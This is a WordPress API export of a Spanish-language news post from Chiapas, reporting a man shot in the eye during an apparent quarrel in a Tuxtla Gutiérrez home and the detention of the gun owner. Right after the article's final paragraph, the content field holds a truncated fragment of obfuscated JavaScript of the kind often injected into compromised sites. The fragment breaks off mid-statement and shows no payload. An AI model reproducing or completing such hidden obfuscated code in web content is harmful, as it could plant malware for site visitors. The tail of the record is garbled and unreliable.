{"id":9930,"date":"2023-05-08T01:33:49","date_gmt":"2023-05-08T01:33:49","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9930"},"modified":"2023-05-08T01:33:50","modified_gmt":"2023-05-08T01:33:50","slug":"en-presunta-rina-hieren-de-un-balazo-en-el-ojo-a-sujeto","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9930","title":{"rendered":"En presunta ri\u00f1a hieren de un balazo en el ojo a sujeto"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"484\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-07-at-2.05.20-PM-1024x484.jpeg\" alt=\"\" class=\"wp-image-9931\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-07-at-2.05.20-PM-1024x484.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-07-at-2.05.20-PM-300x142.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-07-at-2.05.20-PM-768x363.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-07-at-2.05.20-PM-1536x727.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-07-at-2.05.20-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 7 de mayo del 2023. Tuxtla Guti\u00e9rrez.- Este domingo, un hombre fue herido de un balazo en un ojo, en una presunta ri\u00f1a ocurrida al interior de una vivienda localizada en la 8a Sur, entre Calle Central y Primera Poniente.<\/p>\n\n\n\n<p>Los reportes de la polic\u00eda informaron que, cerca de las 11:39 se reporto que una persona estaba herida de bala al interior de la casa marcada con el n\u00famero 160.<\/p>\n\n\n\n<p>Al arribo de los polic\u00edas los vecinos informaron que hab\u00edan escuchado detonaciones.<\/p>\n\n\n\n<p>Los uniformados llamaron a la puerta y sali\u00f3 un hombre que se identific\u00f3 como Emmanuel de 36 a\u00f1os de edad quien detall\u00f3 que en el lugar hab\u00eda un sujeto herido de bala en la cocina.<\/p>\n\n\n\n<p>Inmediatamente fue localizado el sujeto con una herida en el ojo, el cual fue identificado como Juan Ignacio de 32 a\u00f1os a\u00f1os.<\/p>\n\n\n\n<p>Emanuel relat\u00f3 a los uniformados que todo se deriv\u00f3 de una discusi\u00f3n que se sali\u00f3 de control y sac\u00f3 el arma de fuego que tiene para su protecci\u00f3n y la accion\u00f3.<\/p>\n\n\n\n<p>El arma de fuego, Smith&amp;Wesson fue localizada debajo de la cama por lo que fue asegurado el propietario.<\/p>\n\n\n\n<p>El lesionado fue auxiliado por param\u00e9dicos de Protecci\u00f3n Civil Municipal y trasladado al hospital G\u00f3mez Maza para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>El agresor fue trasladado a las instalaciones de la Fiscal\u00eda Metropolitana para determinar su situaci\u00f3n jur\u00eddica.<\/p>\n\n\n\n<p>Hasta el momento se desconocen los motivos por los que deriv\u00f3 la agresi\u00f3n y la relaci\u00f3n de ambos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 7 de mayo del 2023. Tuxtla Guti\u00e9rrez.- Este domingo, un hombre fue herido de un balazo en un ojo, en una presunta ri\u00f1a ocurrida al interior de una vivienda localizada en la 8a Sur, entre Calle Central y Primera Poniente. Los reportes de la polic\u00eda informaron que, cerca de las 11:39 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9931,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-9930","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9930","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9930"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9930\/revisions"}],"predecessor-version":[{"id":9932,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9930\/revisions\/9932"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9931"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9930"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9930"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9930"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}